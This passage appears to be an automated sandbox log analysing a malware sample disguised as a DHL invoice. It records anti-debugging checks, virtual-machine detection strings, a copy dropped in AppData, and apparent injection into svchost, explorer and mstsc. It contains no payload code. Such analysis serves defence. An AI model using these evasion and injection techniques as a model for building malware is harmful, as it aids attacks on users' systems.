Source: explorer.exe, 00000015.00000002.2698810069.000000000C287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000015.00000002.2698810069.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.2339985971.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_00409AB0 rdtsc

3_2_00409AB0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0040ACF0 LdrLoadDll,

3_2_0040ACF0

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0047EAA2 BlockInput,

0_2_0047EAA2

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_00432622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00432622

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_004042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004042DE

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00424CE8 mov eax, dword ptr fs:[00000030h]	0_2_00424CE8
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_019A3530 mov eax, dword ptr fs:[00000030h]	0_2_019A3530
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_019A34D0 mov eax, dword ptr fs:[00000030h]	0_2_019A34D0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_019A1E70 mov eax, dword ptr fs:[00000030h]	0_2_019A1E70
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00644CE8 mov eax, dword ptr fs:[00000030h]	2_2_00644CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_01DE3530 mov eax, dword ptr fs:[00000030h]	2_2_01DE3530
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_01DE34D0 mov eax, dword ptr fs:[00000030h]	2_2_01DE34D0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_01DE1E70 mov eax, dword ptr fs:[00000030h]	2_2_01DE1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEC3CD mov eax, dword ptr fs:[00000030h]	3_2_03CEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]	3_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]	3_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]	3_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]	3_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB63C0 mov eax, dword ptr fs:[00000030h]	3_2_03CB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	3_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	3_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]	3_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	3_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD43D4 mov eax, dword ptr fs:[00000030h]	3_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD43D4 mov eax, dword ptr fs:[00000030h]	3_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	3_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	3_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	3_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C663FF mov eax, dword ptr fs:[00000030h]	3_2_03C663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]	3_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]	3_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]	3_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5438F mov eax, dword ptr fs:[00000030h]	3_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5438F mov eax, dword ptr fs:[00000030h]	3_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]	3_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]	3_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]	3_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov ecx, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFA352 mov eax, dword ptr fs:[00000030h]	3_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD8350 mov ecx, dword ptr fs:[00000030h]	3_2_03CD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D0634F mov eax, dword ptr fs:[00000030h]	3_2_03D0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD437C mov eax, dword ptr fs:[00000030h]	3_2_03CD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]	3_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]	3_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A30B mov eax, dword ptr fs:[00000030h]	3_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C310 mov ecx, dword ptr fs:[00000030h]	3_2_03C2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C50310 mov ecx, dword ptr fs:[00000030h]	3_2_03C50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D08324 mov eax, dword ptr fs:[00000030h]	3_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D08324 mov ecx, dword ptr fs:[00000030h]	3_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D08324 mov eax, dword ptr fs:[00000030h]	3_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D08324 mov eax, dword ptr fs:[00000030h]	3_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]	3_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D062D6 mov eax, dword ptr fs:[00000030h]	3_2_03D062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]	3_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]	3_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402E1 mov eax, dword ptr fs:[00000030h]	3_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E284 mov eax, dword ptr fs:[00000030h]	3_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E284 mov eax, dword ptr fs:[00000030h]	3_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]	3_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]	3_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB0283 mov eax, dword ptr fs:[00000030h]	3_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402A0 mov eax, dword ptr fs:[00000030h]	3_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C402A0 mov eax, dword ptr fs:[00000030h]	3_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC62A0 mov eax, dword ptr fs:[00000030h]	3_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB8243 mov eax, dword ptr fs:[00000030h]	3_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB8243 mov ecx, dword ptr fs:[00000030h]	3_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D0625D mov eax, dword ptr fs:[00000030h]	3_2_03D0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A250 mov eax, dword ptr fs:[00000030h]	3_2_03C2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36259 mov eax, dword ptr fs:[00000030h]	3_2_03C36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEA250 mov eax, dword ptr fs:[00000030h]	3_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEA250 mov eax, dword ptr fs:[00000030h]	3_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]	3_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]	3_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34260 mov eax, dword ptr fs:[00000030h]	3_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2826B mov eax, dword ptr fs:[00000030h]	3_2_03C2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274 mov eax, dword ptr fs:[00000030h]	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2823B mov eax, dword ptr fs:[00000030h]	3_2_03C2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF61C3 mov eax, dword ptr fs:[00000030h]	3_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF61C3 mov eax, dword ptr fs:[00000030h]	3_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]	3_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D061E5 mov eax, dword ptr fs:[00000030h]	3_2_03D061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C601F8 mov eax, dword ptr fs:[00000030h]	3_2_03C601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C70185 mov eax, dword ptr fs:[00000030h]	3_2_03C70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEC188 mov eax, dword ptr fs:[00000030h]	3_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEC188 mov eax, dword ptr fs:[00000030h]	3_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD4180 mov eax, dword ptr fs:[00000030h]	3_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD4180 mov eax, dword ptr fs:[00000030h]	3_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]	3_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]	3_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]	3_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB019F mov eax, dword ptr fs:[00000030h]	3_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]	3_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]	3_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A197 mov eax, dword ptr fs:[00000030h]	3_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov ecx, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC4144 mov eax, dword ptr fs:[00000030h]	3_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C156 mov eax, dword ptr fs:[00000030h]	3_2_03C2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC8158 mov eax, dword ptr fs:[00000030h]	3_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36154 mov eax, dword ptr fs:[00000030h]	3_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36154 mov eax, dword ptr fs:[00000030h]	3_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04164 mov eax, dword ptr fs:[00000030h]	3_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04164 mov eax, dword ptr fs:[00000030h]	3_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov eax, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	3_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118 mov ecx, dword ptr fs:[00000030h]	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118 mov eax, dword ptr fs:[00000030h]	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF0115 mov eax, dword ptr fs:[00000030h]	3_2_03CF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C60124 mov eax, dword ptr fs:[00000030h]	3_2_03C60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB20DE mov eax, dword ptr fs:[00000030h]	3_2_03CB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_03C2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C380E9 mov eax, dword ptr fs:[00000030h]	3_2_03C380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB60E0 mov eax, dword ptr fs:[00000030h]	3_2_03CB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]	3_2_03C2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C720F0 mov ecx, dword ptr fs:[00000030h]	3_2_03C720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3208A mov eax, dword ptr fs:[00000030h]	3_2_03C3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C280A0 mov eax, dword ptr fs:[00000030h]	3_2_03C280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC80A8 mov eax, dword ptr fs:[00000030h]	3_2_03CC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF60B8 mov eax, dword ptr fs:[00000030h]	3_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]	3_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C32050 mov eax, dword ptr fs:[00000030h]	3_2_03C32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6050 mov eax, dword ptr fs:[00000030h]	3_2_03CB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5C073 mov eax, dword ptr fs:[00000030h]	3_2_03C5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB4000 mov ecx, dword ptr fs:[00000030h]	3_2_03CB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000 mov eax, dword ptr fs:[00000030h]	3_2_03CD2000
